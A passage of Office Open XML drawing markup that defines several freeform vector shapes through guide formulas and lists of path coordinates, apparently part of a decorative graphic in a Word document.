                            <a:ext cx="14" cy="87"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 58 w 82"/>
                              <a:gd name="T1" fmla="*/ 0 h 526"/>
                              <a:gd name="T2" fmla="*/ 17 w 82"/>
                              <a:gd name="T3" fmla="*/ 136 h 526"/>
                              <a:gd name="T4" fmla="*/ 0 w 82"/>
                              <a:gd name="T5" fmla="*/ 292 h 526"/>
                              <a:gd name="T6" fmla="*/ 8 w 82"/>
                              <a:gd name="T7" fmla="*/ 409 h 526"/>
                              <a:gd name="T8" fmla="*/ 25 w 82"/>
                              <a:gd name="T9" fmla="*/ 506 h 526"/>
                              <a:gd name="T10" fmla="*/ 49 w 82"/>
                              <a:gd name="T11" fmla="*/ 526 h 526"/>
                              <a:gd name="T12" fmla="*/ 66 w 82"/>
                              <a:gd name="T13" fmla="*/ 487 h 526"/>
                              <a:gd name="T14" fmla="*/ 82 w 82"/>
                              <a:gd name="T15" fmla="*/ 467 h 526"/>
                              <a:gd name="T16" fmla="*/ 74 w 82"/>
                              <a:gd name="T17" fmla="*/ 428 h 526"/>
                              <a:gd name="T18" fmla="*/ 49 w 82"/>
                              <a:gd name="T19" fmla="*/ 312 h 526"/>
                              <a:gd name="T20" fmla="*/ 41 w 82"/>
                              <a:gd name="T21" fmla="*/ 214 h 526"/>
                              <a:gd name="T22" fmla="*/ 49 w 82"/>
                              <a:gd name="T23" fmla="*/ 117 h 526"/>
                              <a:gd name="T24" fmla="*/ 66 w 82"/>
                              <a:gd name="T25" fmla="*/ 39 h 526"/>
                              <a:gd name="T26" fmla="*/ 66 w 82"/>
                              <a:gd name="T27" fmla="*/ 0 h 526"/>
                              <a:gd name="T28" fmla="*/ 58 w 82"/>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26">
                                <a:moveTo>
                                  <a:pt x="58" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="17" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="428"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5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567058" name="Freeform 19"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5588" y="4342"/>
                            <a:ext cx="36" cy="35"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 16 w 214"/>
                              <a:gd name="T1" fmla="*/ 136 h 214"/>
                              <a:gd name="T2" fmla="*/ 49 w 214"/>
                              <a:gd name="T3" fmla="*/ 194 h 214"/>
                              <a:gd name="T4" fmla="*/ 99 w 214"/>
                              <a:gd name="T5" fmla="*/ 214 h 214"/>
                              <a:gd name="T6" fmla="*/ 148 w 214"/>
                              <a:gd name="T7" fmla="*/ 214 h 214"/>
                              <a:gd name="T8" fmla="*/ 197 w 214"/>
                              <a:gd name="T9" fmla="*/ 175 h 214"/>
                              <a:gd name="T10" fmla="*/ 214 w 214"/>
                              <a:gd name="T11" fmla="*/ 156 h 214"/>
                              <a:gd name="T12" fmla="*/ 214 w 214"/>
                              <a:gd name="T13" fmla="*/ 136 h 214"/>
                              <a:gd name="T14" fmla="*/ 206 w 214"/>
                              <a:gd name="T15" fmla="*/ 136 h 214"/>
                              <a:gd name="T16" fmla="*/ 189 w 214"/>
                              <a:gd name="T17" fmla="*/ 136 h 214"/>
                              <a:gd name="T18" fmla="*/ 115 w 214"/>
                              <a:gd name="T19" fmla="*/ 117 h 214"/>
                              <a:gd name="T20" fmla="*/ 74 w 214"/>
                              <a:gd name="T21" fmla="*/ 78 h 214"/>
                              <a:gd name="T22" fmla="*/ 41 w 214"/>
                              <a:gd name="T23" fmla="*/ 19 h 214"/>
                              <a:gd name="T24" fmla="*/ 25 w 214"/>
                              <a:gd name="T25" fmla="*/ 0 h 214"/>
                              <a:gd name="T26" fmla="*/ 8 w 214"/>
                              <a:gd name="T27" fmla="*/ 39 h 214"/>
                              <a:gd name="T28" fmla="*/ 0 w 214"/>
                              <a:gd name="T29" fmla="*/ 78 h 214"/>
                              <a:gd name="T30" fmla="*/ 1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136"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="49" y="194"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="206" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1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58431542" name="Freeform 20"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5558" y="4189"/>
                            <a:ext cx="29" cy="16"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 8 w 173"/>
                              <a:gd name="T1" fmla="*/ 20 h 98"/>
                              <a:gd name="T2" fmla="*/ 41 w 173"/>
                              <a:gd name="T3" fmla="*/ 20 h 98"/>
                              <a:gd name="T4" fmla="*/ 74 w 173"/>
                              <a:gd name="T5" fmla="*/ 78 h 98"/>
                              <a:gd name="T6" fmla="*/ 91 w 173"/>
                              <a:gd name="T7" fmla="*/ 98 h 98"/>
                              <a:gd name="T8" fmla="*/ 107 w 173"/>
                              <a:gd name="T9" fmla="*/ 78 h 98"/>
                              <a:gd name="T10" fmla="*/ 165 w 173"/>
                              <a:gd name="T11" fmla="*/ 20 h 98"/>
                              <a:gd name="T12" fmla="*/ 173 w 173"/>
                              <a:gd name="T13" fmla="*/ 0 h 98"/>
                              <a:gd name="T14" fmla="*/ 156 w 173"/>
                              <a:gd name="T15" fmla="*/ 0 h 98"/>
                              <a:gd name="T16" fmla="*/ 107 w 173"/>
                              <a:gd name="T17" fmla="*/ 20 h 98"/>
                              <a:gd name="T18" fmla="*/ 91 w 173"/>
                              <a:gd name="T19" fmla="*/ 20 h 98"/>
                              <a:gd name="T20" fmla="*/ 58 w 173"/>
                              <a:gd name="T21" fmla="*/ 0 h 98"/>
                              <a:gd name="T22" fmla="*/ 17 w 173"/>
                              <a:gd name="T23" fmla="*/ 0 h 98"/>
                              <a:gd name="T24" fmla="*/ 0 w 173"/>
                              <a:gd name="T25" fmla="*/ 20 h 98"/>
                              <a:gd name="T26" fmla="*/ 0 w 173"/>
                              <a:gd name="T27" fmla="*/ 39 h 98"/>
                              <a:gd name="T28" fmla="*/ 8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20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="41" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="98"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8"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807333406" name="Freeform 21"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5559" y="4082"/>
                            <a:ext cx="46" cy="107"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 272"/>
                              <a:gd name="T1" fmla="*/ 623 h 642"/>
                              <a:gd name="T2" fmla="*/ 17 w 272"/>
                              <a:gd name="T3" fmla="*/ 603 h 642"/>
                              <a:gd name="T4" fmla="*/ 49 w 272"/>
                              <a:gd name="T5" fmla="*/ 526 h 642"/>
                              <a:gd name="T6" fmla="*/ 132 w 272"/>
                              <a:gd name="T7" fmla="*/ 331 h 642"/>
                              <a:gd name="T8" fmla="*/ 214 w 272"/>
                              <a:gd name="T9" fmla="*/ 117 h 642"/>
                              <a:gd name="T10" fmla="*/ 247 w 272"/>
                              <a:gd name="T11" fmla="*/ 39 h 642"/>
                              <a:gd name="T12" fmla="*/ 263 w 272"/>
                              <a:gd name="T13" fmla="*/ 0 h 642"/>
                              <a:gd name="T14" fmla="*/ 272 w 272"/>
                              <a:gd name="T15" fmla="*/ 20 h 642"/>
                              <a:gd name="T16" fmla="*/ 272 w 272"/>
                              <a:gd name="T17" fmla="*/ 78 h 642"/>
                              <a:gd name="T18" fmla="*/ 247 w 272"/>
                              <a:gd name="T19" fmla="*/ 234 h 642"/>
                              <a:gd name="T20" fmla="*/ 247 w 272"/>
                              <a:gd name="T21" fmla="*/ 312 h 642"/>
                              <a:gd name="T22" fmla="*/ 255 w 272"/>
                              <a:gd name="T23" fmla="*/ 389 h 642"/>
                              <a:gd name="T24" fmla="*/ 255 w 272"/>
                              <a:gd name="T25" fmla="*/ 409 h 642"/>
                              <a:gd name="T26" fmla="*/ 247 w 272"/>
                              <a:gd name="T27" fmla="*/ 409 h 642"/>
                              <a:gd name="T28" fmla="*/ 198 w 272"/>
                              <a:gd name="T29" fmla="*/ 409 h 642"/>
                              <a:gd name="T30" fmla="*/ 140 w 272"/>
                              <a:gd name="T31" fmla="*/ 467 h 642"/>
                              <a:gd name="T32" fmla="*/ 74 w 272"/>
                              <a:gd name="T33" fmla="*/ 545 h 642"/>
                              <a:gd name="T34" fmla="*/ 25 w 272"/>
                              <a:gd name="T35" fmla="*/ 623 h 642"/>
                              <a:gd name="T36" fmla="*/ 0 w 272"/>
                              <a:gd name="T37" fmla="*/ 642 h 642"/>
                              <a:gd name="T38" fmla="*/ 0 w 272"/>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623"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="17" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="198" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0"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78710667" name="Freeform 22"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5601" y="4062"/>
                            <a:ext cx="8" cy="78"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 17 w 50"/>
                              <a:gd name="T1" fmla="*/ 20 h 467"/>
                              <a:gd name="T2" fmla="*/ 0 w 50"/>
                              <a:gd name="T3" fmla="*/ 117 h 467"/>
                              <a:gd name="T4" fmla="*/ 0 w 50"/>
                              <a:gd name="T5" fmla="*/ 156 h 467"/>
                              <a:gd name="T6" fmla="*/ 9 w 50"/>
                              <a:gd name="T7" fmla="*/ 195 h 467"/>
                              <a:gd name="T8" fmla="*/ 17 w 50"/>
                              <a:gd name="T9" fmla="*/ 273 h 467"/>
                              <a:gd name="T10" fmla="*/ 17 w 50"/>
                              <a:gd name="T11" fmla="*/ 409 h 467"/>
                              <a:gd name="T12" fmla="*/ 9 w 50"/>
                              <a:gd name="T13" fmla="*/ 448 h 467"/>
                              <a:gd name="T14" fmla="*/ 17 w 50"/>
                              <a:gd name="T15" fmla="*/ 467 h 467"/>
                              <a:gd name="T16" fmla="*/ 17 w 50"/>
                              <a:gd name="T17" fmla="*/ 467 h 467"/>
                              <a:gd name="T18" fmla="*/ 25 w 50"/>
                              <a:gd name="T19" fmla="*/ 448 h 467"/>
                              <a:gd name="T20" fmla="*/ 42 w 50"/>
                              <a:gd name="T21" fmla="*/ 351 h 467"/>
                              <a:gd name="T22" fmla="*/ 50 w 50"/>
                              <a:gd name="T23" fmla="*/ 234 h 467"/>
                              <a:gd name="T24" fmla="*/ 42 w 50"/>
                              <a:gd name="T25" fmla="*/ 117 h 467"/>
                              <a:gd name="T26" fmla="*/ 25 w 50"/>
                              <a:gd name="T27" fmla="*/ 0 h 467"/>
                              <a:gd name="T28" fmla="*/ 25 w 50"/>
                              <a:gd name="T29" fmla="*/ 0 h 467"/>
                              <a:gd name="T30" fmla="*/ 17 w 50"/>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67">
                                <a:moveTo>
                                  <a:pt x="17" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="273"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="50" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17"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913579931" name="Freeform 23"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5629" y="4208"/>
                            <a:ext cx="39" cy="36"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 230 w 230"/>
                              <a:gd name="T1" fmla="*/ 20 h 214"/>
                              <a:gd name="T2" fmla="*/ 181 w 230"/>
                              <a:gd name="T3" fmla="*/ 117 h 214"/>
                              <a:gd name="T4" fmla="*/ 123 w 230"/>
                              <a:gd name="T5" fmla="*/ 195 h 214"/>
                              <a:gd name="T6" fmla="*/ 57 w 230"/>
                              <a:gd name="T7" fmla="*/ 214 h 214"/>
                              <a:gd name="T8" fmla="*/ 32 w 230"/>
                              <a:gd name="T9" fmla="*/ 195 h 214"/>
                              <a:gd name="T10" fmla="*/ 8 w 230"/>
                              <a:gd name="T11" fmla="*/ 156 h 214"/>
                              <a:gd name="T12" fmla="*/ 0 w 230"/>
                              <a:gd name="T13" fmla="*/ 117 h 214"/>
                              <a:gd name="T14" fmla="*/ 0 w 230"/>
                              <a:gd name="T15" fmla="*/ 78 h 214"/>
                              <a:gd name="T16" fmla="*/ 8 w 230"/>
                              <a:gd name="T17" fmla="*/ 78 h 214"/>
                              <a:gd name="T18" fmla="*/ 24 w 230"/>
                              <a:gd name="T19" fmla="*/ 78 h 214"/>
                              <a:gd name="T20" fmla="*/ 65 w 230"/>
                              <a:gd name="T21" fmla="*/ 117 h 214"/>
                              <a:gd name="T22" fmla="*/ 123 w 230"/>
                              <a:gd name="T23" fmla="*/ 117 h 214"/>
                              <a:gd name="T24" fmla="*/ 181 w 230"/>
                              <a:gd name="T25" fmla="*/ 78 h 214"/>
                              <a:gd name="T26" fmla="*/ 222 w 230"/>
                              <a:gd name="T27" fmla="*/ 20 h 214"/>
                              <a:gd name="T28" fmla="*/ 230 w 230"/>
                              <a:gd name="T29" fmla="*/ 0 h 214"/>
                              <a:gd name="T30" fmla="*/ 230 w 230"/>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214">
                                <a:moveTo>
                                  <a:pt x="230" y="20"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="181" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="24" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="65" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="181" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="222" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23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26930199" name="Freeform 24"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5665" y="4117"/>
                            <a:ext cx="14" cy="75"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 82 w 82"/>
                              <a:gd name="T1" fmla="*/ 448 h 448"/>
                              <a:gd name="T2" fmla="*/ 57 w 82"/>
                              <a:gd name="T3" fmla="*/ 448 h 448"/>
                              <a:gd name="T4" fmla="*/ 33 w 82"/>
                              <a:gd name="T5" fmla="*/ 409 h 448"/>
                              <a:gd name="T6" fmla="*/ 8 w 82"/>
                              <a:gd name="T7" fmla="*/ 331 h 448"/>
                              <a:gd name="T8" fmla="*/ 0 w 82"/>
                              <a:gd name="T9" fmla="*/ 253 h 448"/>
                              <a:gd name="T10" fmla="*/ 8 w 82"/>
                              <a:gd name="T11" fmla="*/ 156 h 448"/>
                              <a:gd name="T12" fmla="*/ 49 w 82"/>
                              <a:gd name="T13" fmla="*/ 39 h 448"/>
                              <a:gd name="T14" fmla="*/ 57 w 82"/>
                              <a:gd name="T15" fmla="*/ 0 h 448"/>
                              <a:gd name="T16" fmla="*/ 66 w 82"/>
                              <a:gd name="T17" fmla="*/ 0 h 448"/>
                              <a:gd name="T18" fmla="*/ 74 w 82"/>
                              <a:gd name="T19" fmla="*/ 20 h 448"/>
                              <a:gd name="T20" fmla="*/ 66 w 82"/>
                              <a:gd name="T21" fmla="*/ 78 h 448"/>
                              <a:gd name="T22" fmla="*/ 57 w 82"/>
                              <a:gd name="T23" fmla="*/ 136 h 448"/>
                              <a:gd name="T24" fmla="*/ 57 w 82"/>
                              <a:gd name="T25" fmla="*/ 195 h 448"/>
                              <a:gd name="T26" fmla="*/ 66 w 82"/>
                              <a:gd name="T27" fmla="*/ 312 h 448"/>
                              <a:gd name="T28" fmla="*/ 82 w 82"/>
                              <a:gd name="T29" fmla="*/ 389 h 448"/>
                              <a:gd name="T30" fmla="*/ 82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2" y="448"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="57" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="409"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="312"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82"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832474762" name="Freeform 25"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6884" y="4251"/>
                            <a:ext cx="47" cy="113"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 123 w 280"/>
                              <a:gd name="T1" fmla="*/ 603 h 681"/>
                              <a:gd name="T2" fmla="*/ 82 w 280"/>
                              <a:gd name="T3" fmla="*/ 642 h 681"/>
                              <a:gd name="T4" fmla="*/ 49 w 280"/>
                              <a:gd name="T5" fmla="*/ 642 h 681"/>
                              <a:gd name="T6" fmla="*/ 49 w 280"/>
                              <a:gd name="T7" fmla="*/ 564 h 681"/>
                              <a:gd name="T8" fmla="*/ 66 w 280"/>
                              <a:gd name="T9" fmla="*/ 448 h 681"/>
                              <a:gd name="T10" fmla="*/ 58 w 280"/>
                              <a:gd name="T11" fmla="*/ 272 h 681"/>
                              <a:gd name="T12" fmla="*/ 41 w 280"/>
                              <a:gd name="T13" fmla="*/ 175 h 681"/>
                              <a:gd name="T14" fmla="*/ 8 w 280"/>
                              <a:gd name="T15" fmla="*/ 39 h 681"/>
                              <a:gd name="T16" fmla="*/ 0 w 280"/>
                              <a:gd name="T17" fmla="*/ 20 h 681"/>
                              <a:gd name="T18" fmla="*/ 8 w 280"/>
                              <a:gd name="T19" fmla="*/ 0 h 681"/>
                              <a:gd name="T20" fmla="*/ 25 w 280"/>
                              <a:gd name="T21" fmla="*/ 39 h 681"/>
                              <a:gd name="T22" fmla="*/ 58 w 280"/>
                              <a:gd name="T23" fmla="*/ 117 h 681"/>
                              <a:gd name="T24" fmla="*/ 148 w 280"/>
                              <a:gd name="T25" fmla="*/ 331 h 681"/>
                              <a:gd name="T26" fmla="*/ 239 w 280"/>
                              <a:gd name="T27" fmla="*/ 545 h 681"/>
                              <a:gd name="T28" fmla="*/ 263 w 280"/>
                              <a:gd name="T29" fmla="*/ 603 h 681"/>
                              <a:gd name="T30" fmla="*/ 280 w 280"/>
                              <a:gd name="T31" fmla="*/ 642 h 681"/>
                              <a:gd name="T32" fmla="*/ 280 w 280"/>
                              <a:gd name="T33" fmla="*/ 681 h 681"/>
                              <a:gd name="T34" fmla="*/ 272 w 280"/>
                              <a:gd name="T35" fmla="*/ 681 h 681"/>
                              <a:gd name="T36" fmla="*/ 230 w 280"/>
                              <a:gd name="T37" fmla="*/ 662 h 681"/>
                              <a:gd name="T38" fmla="*/ 189 w 280"/>
                              <a:gd name="T39" fmla="*/ 642 h 681"/>
                              <a:gd name="T40" fmla="*/ 148 w 280"/>
                              <a:gd name="T41" fmla="*/ 603 h 681"/>
                              <a:gd name="T42" fmla="*/ 140 w 280"/>
                              <a:gd name="T43" fmla="*/ 603 h 681"/>
                              <a:gd name="T44" fmla="*/ 123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23" y="603"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="82" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="272"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="20"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="263" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="272" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="230" y="662"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="642"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123"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118633111" name="Freeform 26"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="6939" y="4238"/>
                            <a:ext cx="13" cy="87"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 16 w 74"/>
                              <a:gd name="T1" fmla="*/ 0 h 526"/>
                              <a:gd name="T2" fmla="*/ 57 w 74"/>
                              <a:gd name="T3" fmla="*/ 136 h 526"/>
                              <a:gd name="T4" fmla="*/ 74 w 74"/>
                              <a:gd name="T5" fmla="*/ 292 h 526"/>
                              <a:gd name="T6" fmla="*/ 74 w 74"/>
                              <a:gd name="T7" fmla="*/ 409 h 526"/>
                              <a:gd name="T8" fmla="*/ 49 w 74"/>
                              <a:gd name="T9" fmla="*/ 506 h 526"/>
                              <a:gd name="T10" fmla="*/ 33 w 74"/>
                              <a:gd name="T11" fmla="*/ 526 h 526"/>
                              <a:gd name="T12" fmla="*/ 8 w 74"/>
                              <a:gd name="T13" fmla="*/ 487 h 526"/>
                              <a:gd name="T14" fmla="*/ 0 w 74"/>
                              <a:gd name="T15" fmla="*/ 467 h 526"/>
